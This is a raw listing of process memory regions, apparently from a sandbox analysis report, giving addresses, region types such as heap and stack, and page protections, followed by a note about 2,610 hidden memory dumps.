page read and write
|
||
2D8F65FA000
|
heap
|
page read and write
|
||
7FFDFB746000
|
unkown
|
page execute and read and write
|
||
19CBDB43000
|
heap
|
page read and write
|
||
1E0025E0000
|
trusted library section
|
page read and write
|
||
23A0FFFB000
|
heap
|
page read and write
|
||
7FFE13331000
|
unkown
|
page execute read
|
||
21918970000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FF771DBC000
|
unkown
|
page read and write
|
||
34099FE000
|
stack
|
page read and write
|
||
1764FCE000
|
stack
|
page read and write
|
||
A3550FE000
|
stack
|
page read and write
|
||
215A32CF000
|
heap
|
page read and write
|
||
21645AAD000
|
heap
|
page read and write
|
||
7FFD9B120000
|
trusted library allocation
|
page execute and read and write
|
||
219001D0000
|
heap
|
page execute and read and write
|
||
12D0000
|
heap
|
page read and write
|
||
340987F000
|
stack
|
page read and write
|
||
21E8F071000
|
heap
|
page read and write
|
||
2D8F5DDC000
|
heap
|
page read and write
|
||
19CBDB41000
|
heap
|
page read and write
|
||
282ACFC1000
|
heap
|
page read and write
|
||
1D920500000
|
heap
|
page read and write
|
||
1E0043E7000
|
trusted library allocation
|
page read and write
|
||
2E4A9A7C000
|
heap
|
page read and write
|
||
181B0C40000
|
direct allocation
|
page read and write
|
||
1A601AA0000
|
heap
|
page read and write
|
||
4C2D9FE000
|
stack
|
page read and write
|
||
F083B9F000
|
stack
|
page read and write
|
||
1A49C2B0000
|
heap
|
page read and write
|
||
7FFD9AD10000
|
trusted library allocation
|
page read and write
|
||
22156728000
|
heap
|
page read and write
|
||
181AD920000
|
direct allocation
|
page read and write
|
||
2D8F6C5C000
|
heap
|
page read and write
|
||
EAE000
|
heap
|
page read and write
|
||
7FFE10231000
|
unkown
|
page execute and read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
21918A6B000
|
heap
|
page read and write
|
||
1A601A40000
|
heap
|
page read and write
|
||
7FFD9AD20000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F648B000
|
heap
|
page read and write
|
||
2D8F64D1000
|
heap
|
page read and write
|
||
20871374000
|
heap
|
page read and write
|
||
24EF2B00000
|
heap
|
page read and write
|
||
2D8F72E2000
|
heap
|
page read and write
|
||
2625EAF0000
|
heap
|
page read and write
|
||
2E4A9C00000
|
heap
|
page read and write
|
||
21645ACC000
|
heap
|
page read and write
|
||
380070C000
|
stack
|
page read and write
|
||
282ACFC1000
|
heap
|
page read and write
|
||
2D8F665F000
|
heap
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
19CBC288000
|
heap
|
page read and write
|
||
2D8F5DD4000
|
heap
|
page read and write
|
||
23D52B5D000
|
heap
|
page read and write
|
||
2D8F63E1000
|
heap
|
page read and write
|
||
20DBCB78000
|
heap
|
page read and write
|
||
19CBBD30000
|
trusted library allocation
|
page read and write
|
||
7FFD9ADE6000
|
trusted library allocation
|
page execute and read and write
|
||
27CC3760000
|
heap
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
235B3130000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
235B31C0000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
2D8F6D64000
|
heap
|
page read and write
|
||
1E01AD00000
|
heap
|
page read and write
|
||
19CBBB89000
|
heap
|
page read and write
|
||
E6B000
|
trusted library allocation
|
page execute and read and write
|
||
1C34C4A0000
|
heap
|
page read and write
|
||
2D8F64D5000
|
heap
|
page read and write
|
||
2D8F6668000
|
heap
|
page read and write
|
||
263BF140000
|
heap
|
page read and write
|
||
1326000
|
heap
|
page read and write
|
||
1326000
|
heap
|
page read and write
|
||
2D8F5D9D000
|
heap
|
page read and write
|
||
2D8F64AE000
|
heap
|
page read and write
|
||
1E002507000
|
heap
|
page execute and read and write
|
||
21645AA7000
|
heap
|
page read and write
|
||
B53273F000
|
stack
|
page read and write
|
||
7FF623F70000
|
unkown
|
page readonly
|
||
2AF86540000
|
heap
|
page read and write
|
||
7FFE1331F000
|
unkown
|
page execute and read and write
|
||
201E0274000
|
heap
|
page read and write
|
||
5438000
|
stack
|
page read and write
|
||
2D8F646F000
|
heap
|
page read and write
|
||
2D8F649E000
|
heap
|
page read and write
|
||
1A60188F000
|
heap
|
page read and write
|
||
2D8F60A7000
|
heap
|
page read and write
|
||
1C34C350000
|
heap
|
page read and write
|
||
300E000
|
stack
|
page read and write
|
||
34428FF000
|
stack
|
page read and write
|
||
181AD7FF000
|
heap
|
page read and write
|
||
7FFDFB73C000
|
unkown
|
page execute and read and write
|
||
282B6460000
|
heap
|
page read and write
|
||
181B0B80000
|
direct allocation
|
page read and write
|
||
2070D46A000
|
heap
|
page read and write
|
||
13DF6D40000
|
heap
|
page read and write
|
||
2D8F649E000
|
heap
|
page read and write
|
||
19CBC2A2000
|
heap
|
page read and write
|
||
2D8F64D5000
|
heap
|
page read and write
|
||
29532521000
|
heap
|
page read and write
|
||
2D8F6460000
|
heap
|
page read and write
|
||
2D8F6643000
|
heap
|
page read and write
|
||
2D8F72E0000
|
direct allocation
|
page read and write
|
||
27CC37B6000
|
heap
|
page read and write
|
||
1E01AB46000
|
heap
|
page read and write
|
||
7FFD9B0E3000
|
trusted library allocation
|
page read and write
|
||
2E4A9A83000
|
heap
|
page read and write
|
||
4C2D1EE000
|
stack
|
page read and write
|
||
2AF862D0000
|
heap
|
page read and write
|
||
7FFDFA227000
|
unkown
|
page read and write
|
||
21015324000
|
heap
|
page read and write
|
||
3CD9000
|
trusted library allocation
|
page read and write
|
||
19F0D2B000
|
stack
|
page read and write
|
||
181AD7A4000
|
heap
|
page read and write
|
||
1D8C000
|
heap
|
page read and write
|
||
4C2DA7E000
|
stack
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
1312000
|
heap
|
page read and write
|
||
19CBC287000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
236FDE20000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
215A32CD000
|
heap
|
page read and write
|
||
181AD81C000
|
heap
|
page read and write
|
||
1E000C10000
|
heap
|
page readonly
|
||
2D8F6428000
|
heap
|
page read and write
|
||
21447490000
|
heap
|
page read and write
|
||
2D8F6450000
|
heap
|
page read and write
|
||
2D8F61F9000
|
heap
|
page read and write
|
||
2D8F6B54000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
427DDFF000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
282AD0A0000
|
heap
|
page read and write
|
||
217B5190000
|
unkown
|
page read and write
|
||
28A22061000
|
heap
|
page read and write
|
||
11F0000
|
heap
|
page execute and read and write
|
||
1A60188D000
|
heap
|
page read and write
|
||
2D8F5D89000
|
heap
|
page read and write
|
||
E36F97F000
|
stack
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
266C4500000
|
heap
|
page read and write
|
||
1200000
|
direct allocation
|
page execute read
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B023000
|
trusted library allocation
|
page read and write
|
||
2D8F3C2F000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F647F000
|
heap
|
page read and write
|
||
7FFD9AFC0000
|
trusted library allocation
|
page read and write
|
||
21E8EE9F000
|
heap
|
page read and write
|
||
2D8F6371000
|
heap
|
page read and write
|
||
2D8F649C000
|
heap
|
page read and write
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
1E01B020000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F63E0000
|
heap
|
page read and write
|
||
2653188A000
|
heap
|
page read and write
|
||
181AD7AC000
|
heap
|
page read and write
|
||
181AD990000
|
direct allocation
|
page read and write
|
||
7FFE11527000
|
unkown
|
page read and write
|
||
1E01AC20000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
21E8EE9C000
|
heap
|
page read and write
|
||
140007000
|
unkown
|
page readonly
|
||
CD6AE7E000
|
stack
|
page read and write
|
||
1C378640000
|
heap
|
page read and write
|
||
21447494000
|
heap
|
page read and write
|
||
26D6BFF000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
282B6210000
|
heap
|
page read and write
|
||
1317000
|
heap
|
page read and write
|
||
FD8F47B000
|
stack
|
page read and write
|
||
215A32CD000
|
heap
|
page read and write
|
||
1E01ABFE000
|
heap
|
page read and write
|
||
256E8B10000
|
heap
|
page read and write
|
||
CF12C9D000
|
stack
|
page read and write
|
||
7FFD9B010000
|
trusted library allocation
|
page read and write
|
||
2191894C000
|
heap
|
page read and write
|
||
2D8F638F000
|
heap
|
page read and write
|
||
B89CBFE000
|
stack
|
page read and write
|
||
2D8F6114000
|
heap
|
page read and write
|
||
22156950000
|
heap
|
page read and write
|
||
2E4A9DD0000
|
heap
|
page read and write
|
||
21918630000
|
heap
|
page read and write
|
||
DDCBC7D000
|
stack
|
page read and write
|
||
7FFD9ADBC000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F6478000
|
heap
|
page read and write
|
||
2E4A9A91000
|
heap
|
page read and write
|
||
181AD801000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
1E01AB0E000
|
heap
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFDFB6FC000
|
unkown
|
page execute and read and write
|
||
2D8F666F000
|
heap
|
page read and write
|
||
19CBBB83000
|
heap
|
page read and write
|
||
27CC3730000
|
heap
|
page read and write
|
||
7FFD9B040000
|
trusted library allocation
|
page read and write
|
||
282B62B1000
|
heap
|
page read and write
|
||
21EE5BD4000
|
heap
|
page read and write
|
||
21E8EEA6000
|
heap
|
page read and write
|
||
2625ECC0000
|
heap
|
page read and write
|
||
236FE204000
|
heap
|
page read and write
|
||
1A49C370000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
20870FE0000
|
heap
|
page read and write
|
||
2D8F643A000
|
heap
|
page read and write
|
||
7FFE10260000
|
unkown
|
page execute and read and write
|
||
7DF4D7620000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F64F1000
|
heap
|
page read and write
|
||
286A5278000
|
heap
|
page read and write
|
||
21E8EEA6000
|
heap
|
page read and write
|
||
7FFDFB320000
|
unkown
|
page readonly
|
||
23A0FF50000
|
heap
|
page read and write
|
||
1F72ED3A000
|
heap
|
page read and write
|
||
2D8F5E6C000
|
heap
|
page read and write
|
||
27CC38A0000
|
heap
|
page read and write
|
||
181AD7D2000
|
heap
|
page read and write
|
||
181AD7FA000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
21900060000
|
trusted library allocation
|
page read and write
|
||
20DBCBA2000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
2D8F5E49000
|
heap
|
page read and write
|
||
B3C2CFF000
|
unkown
|
page read and write
|
||
1DC71000000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1E002940000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
heap
|
page read and write
|
||
20CA0710000
|
heap
|
page read and write
|
||
23D529D0000
|
heap
|
page read and write
|
||
2E4A9A56000
|
heap
|
page read and write
|
||
181B0D61000
|
direct allocation
|
page read and write
|
||
19DCAE90000
|
heap
|
page read and write
|
||
A354DAC000
|
stack
|
page read and write
|
||
196D8988000
|
heap
|
page read and write
|
||
7FFDFAFA1000
|
unkown
|
page execute and read and write
|
||
2D8F64A5000
|
heap
|
page read and write
|
||
7FF623F71000
|
unkown
|
page execute read
|
||
B532478000
|
stack
|
page read and write
|
||
7FFD9B080000
|
trusted library allocation
|
page read and write
|
||
7FF77203B000
|
unkown
|
page readonly
|
||
7FFD9AF40000
|
trusted library allocation
|
page read and write
|
||
23D52AD0000
|
heap
|
page read and write
|
||
21E8EEB8000
|
heap
|
page read and write
|
||
19CBC27F000
|
heap
|
page read and write
|
||
7FFDFB65F000
|
unkown
|
page execute and read and write
|
||
21E8F060000
|
heap
|
page read and write
|
||
7FF623FAE000
|
unkown
|
page write copy
|
||
201E0240000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
7FFD9ACFD000
|
trusted library allocation
|
page execute and read and write
|
||
1B0E000
|
stack
|
page read and write
|
||
2E4A9A30000
|
heap
|
page read and write
|
||
2D8F5DE5000
|
heap
|
page read and write
|
||
2D8F5D8D000
|
heap
|
page read and write
|
||
19CBC2AA000
|
heap
|
page read and write
|
||
2D8F3C3E000
|
heap
|
page read and write
|
||
181AD7AA000
|
heap
|
page read and write
|
||
196D8910000
|
heap
|
page read and write
|
||
7FFE1023C000
|
unkown
|
page execute and read and write
|
||
8F448FF000
|
stack
|
page read and write
|
||
19CBBB57000
|
heap
|
page read and write
|
||
2F7F1BD000
|
stack
|
page read and write
|
||
7FFE01475000
|
unkown
|
page execute and write copy
|
||
2D8F649C000
|
heap
|
page read and write
|
||
2D8F6478000
|
heap
|
page read and write
|
||
2D8F5DE5000
|
heap
|
page read and write
|
||
45D11DF000
|
stack
|
page read and write
|
||
2A62F330000
|
heap
|
page read and write
|
||
2197E228000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
4C2D77E000
|
stack
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F64D6000
|
heap
|
page read and write
|
||
2D8F63F8000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
21015048000
|
heap
|
page read and write
|
||
2D8F649A000
|
heap
|
page read and write
|
||
167E8130000
|
heap
|
page read and write
|
||
3650FE000
|
stack
|
page read and write
|
||
2D8F647A000
|
heap
|
page read and write
|
||
2D8F6280000
|
heap
|
page read and write
|
||
19CBC280000
|
heap
|
page read and write
|
||
7FFE10266000
|
unkown
|
page execute and write copy
|
||
1E01AB50000
|
heap
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
1E000960000
|
heap
|
page read and write
|
||
102BCC000
|
stack
|
page read and write
|
||
2D8F64CD000
|
heap
|
page read and write
|
||
28A22061000
|
heap
|
page read and write
|
||
1E012B10000
|
trusted library allocation
|
page read and write
|
||
19CBBB75000
|
heap
|
page read and write
|
||
19CBBB66000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
F0E9FDE000
|
stack
|
page read and write
|
||
1E01AC35000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
181AD81D000
|
heap
|
page read and write
|
||
26531880000
|
heap
|
page read and write
|
||
2D8F3C43000
|
heap
|
page read and write
|
||
19CBBCF0000
|
heap
|
page read and write
|
||
2D8F5E19000
|
heap
|
page read and write
|
||
20DBCE44000
|
heap
|
page read and write
|
||
7FFE10301000
|
unkown
|
page execute and read and write
|
||
2D8F6487000
|
heap
|
page read and write
|
||
20CA0910000
|
heap
|
page read and write
|
||
2D8F5DE0000
|
heap
|
page read and write
|
||
2625EB07000
|
heap
|
page read and write
|
||
2D8F3C5A000
|
heap
|
page read and write
|
||
45D157F000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
13DF6C40000
|
heap
|
page read and write
|
||
2D8F72EC000
|
direct allocation
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
2CD1000
|
trusted library allocation
|
page read and write
|
||
19F10FE000
|
stack
|
page read and write
|
||
181AD960000
|
heap
|
page read and write
|
||
EDE000
|
heap
|
page read and write
|
||
7FFE0EB68000
|
unkown
|
page execute and read and write
|
||
7FFE12E11000
|
unkown
|
page execute and read and write
|
||
880000
|
heap
|
page read and write
|
||
7FFD9AEE2000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
2D8F666C000
|
heap
|
page read and write
|
||
7FFE148E1000
|
unkown
|
page execute and read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2E4A9A55000
|
heap
|
page read and write
|
||
181B0C00000
|
direct allocation
|
page read and write
|
||
7FF623F9B000
|
unkown
|
page readonly
|
||
2A62F340000
|
heap
|
page read and write
|
||
7FFE13301000
|
unkown
|
page execute and read and write
|
||
1E000C7D000
|
heap
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
181AD7A6000
|
heap
|
page read and write
|
||
2D8F3CA7000
|
heap
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
2E4A9A68000
|
heap
|
page read and write
|
||
181AD780000
|
heap
|
page read and write
|
||
21901507000
|
trusted library allocation
|
page read and write
|
||
2D199CAB000
|
heap
|
page read and write
|
||
2E4A9A75000
|
heap
|
page read and write
|
||
201E0220000
|
heap
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
23A102D4000
|
heap
|
page read and write
|
||
2D8F6B17000
|
heap
|
page read and write
|
||
2A62F360000
|
heap
|
page read and write
|
||
1E9F000
|
stack
|
page read and write
|
||
2D8F63D8000
|
heap
|
page read and write
|
||
11AE000
|
stack
|
page read and write
|
||
181AD777000
|
heap
|
page read and write
|
||
256E8B29000
|
heap
|
page read and write
|
||
19CBDB4E000
|
heap
|
page read and write
|
||
7FFD9AF50000
|
trusted library allocation
|
page read and write
|
||
19CBBDB2000
|
heap
|
page read and write
|
||
2D8F3CA2000
|
heap
|
page read and write
|
||
1A49C290000
|
heap
|
page read and write
|
||
215A3260000
|
heap
|
page read and write
|
||
19CBBB6B000
|
heap
|
page read and write
|
||
2D8F3C5B000
|
heap
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
2D8F6430000
|
heap
|
page read and write
|
||
2197E140000
|
heap
|
page read and write
|
||
20DBCB9E000
|
heap
|
page read and write
|
||
19CBBB8A000
|
heap
|
page read and write
|
||
2197E1C9000
|
heap
|
page read and write
|
||
2D8F6613000
|
heap
|
page read and write
|
||
196D8970000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1E000BE0000
|
trusted library allocation
|
page read and write
|
||
2AF86470000
|
heap
|
page read and write
|
||
19CBBDB7000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
2D8F609D000
|
heap
|
page read and write
|
||
2E4A9A7E000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F661D000
|
heap
|
page read and write
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
1E004104000
|
trusted library allocation
|
page read and write
|
||
2A62F6B4000
|
heap
|
page read and write
|
||
E36F8FF000
|
stack
|
page read and write
|
||
E4D000
|
trusted library allocation
|
page execute and read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
21901FE4000
|
trusted library allocation
|
page read and write
|
||
375E4FF000
|
stack
|
page read and write
|
||
7FFD9AF20000
|
trusted library allocation
|
page read and write
|
||
19CBC2A4000
|
heap
|
page read and write
|
||
7FFDFB2C0000
|
unkown
|
page execute and read and write
|
||
7FF623FAE000
|
unkown
|
page read and write
|
||
2D8F64E6000
|
heap
|
page read and write
|
||
21EE58BD000
|
heap
|
page read and write
|
||
7FFE01473000
|
unkown
|
page execute and read and write
|
||
2D8F5DB9000
|
heap
|
page read and write
|
||
215A32B8000
|
heap
|
page read and write
|
||
5170000
|
trusted library allocation
|
page read and write
|
||
23D52AB0000
|
heap
|
page read and write
|
||
19CBBB63000
|
heap
|
page read and write
|
||
217B5040000
|
heap
|
page read and write
|
||
27896190000
|
heap
|
page read and write
|
||
2D8F6420000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1B091D80000
|
heap
|
page read and write
|
||
12F9000
|
heap
|
page read and write
|
||
7FFE13346000
|
unkown
|
page read and write
|
||
AA5AB0D000
|
stack
|
page read and write
|
||
AAA73BC000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
196D8991000
|
heap
|
page read and write
|
||
20DBCBBC000
|
heap
|
page read and write
|
||
21645ACB000
|
heap
|
page read and write
|
||
8677CFC000
|
stack
|
page read and write
|
||
215A32D1000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1F72ECB0000
|
heap
|
page read and write
|
||
1A601960000
|
heap
|
page read and write
|
||
219014E7000
|
trusted library allocation
|
page read and write
|
||
1C34C660000
|
unkown
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
2D8F3CA6000
|
heap
|
page read and write
|
||
215A32CD000
|
heap
|
page read and write
|
||
4C2DB7B000
|
stack
|
page read and write
|
||
19DCB06D000
|
heap
|
page read and write
|
||
B5321FE000
|
stack
|
page read and write
|
||
5C00000
|
direct allocation
|
page read and write
|
||
7FFD9AEF0000
|
trusted library allocation
|
page read and write
|
||
1E01ABBF000
|
heap
|
page read and write
|
||
181AD781000
|
heap
|
page read and write
|
||
21645ADC000
|
heap
|
page read and write
|
||
181AD7E0000
|
heap
|
page read and write
|
||
1DC70DC0000
|
heap
|
page read and write
|
||
2D8F5D90000
|
heap
|
page read and write
|
||
7DF4C01F0000
|
trusted library allocation
|
page execute and read and write
|
||
181AD789000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
278CA940000
|
heap
|
page read and write
|
||
181B0D61000
|
direct allocation
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
181AD78E000
|
heap
|
page read and write
|
||
235B3030000
|
heap
|
page read and write
|
||
98F000
|
stack
|
page read and write
|
||
2D8F6430000
|
heap
|
page read and write
|
||
23DAA270000
|
heap
|
page read and write
|
||
7FFDFA224000
|
unkown
|
page execute and read and write
|
||
181AD7CA000
|
heap
|
page read and write
|
||
F7F8FF000
|
stack
|
page read and write
|
||
7FFDFA21C000
|
unkown
|
page execute and read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C3E000
|
heap
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
2D8F6142000
|
heap
|
page read and write
|
||
5F659CF000
|
stack
|
page read and write
|
||
214474A0000
|
heap
|
page read and write
|
||
21900040000
|
trusted library allocation
|
page read and write
|
||
2D8F665B000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F69C7000
|
heap
|
page read and write
|
||
23A0FF70000
|
heap
|
page read and write
|
||
9CFF39F000
|
stack
|
page read and write
|
||
181AD7B3000
|
heap
|
page read and write
|
||
2D8F6D15000
|
heap
|
page read and write
|
||
7FFD9B160000
|
trusted library allocation
|
page read and write
|
||
2D8F3C5A000
|
heap
|
page read and write
|
||
937A9FF000
|
unkown
|
page read and write
|
||
17A51500000
|
heap
|
page read and write
|
||
2625EE74000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
AA5AF7F000
|
stack
|
page read and write
|
||
21645CF4000
|
heap
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
7FF63426B000
|
unkown
|
page readonly
|
||
19DCB061000
|
heap
|
page read and write
|
||
219189DF000
|
heap
|
page read and write
|
||
2AF86535000
|
heap
|
page read and write
|
||
7FFE01300000
|
unkown
|
page readonly
|
||
2625ECE0000
|
heap
|
page read and write
|
||
2D8F6351000
|
heap
|
page read and write
|
||
23D52D00000
|
heap
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
7FFD9B100000
|
trusted library allocation
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
19CBBB78000
|
heap
|
page read and write
|
||
219000F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9ADAC000
|
trusted library allocation
|
page execute and read and write
|
||
17652FF000
|
stack
|
page read and write
|
||
19CBDB4E000
|
heap
|
page read and write
|
||
181AD9F0000
|
heap
|
page read and write
|
There are 2610 hidden memdumps, click here to show them.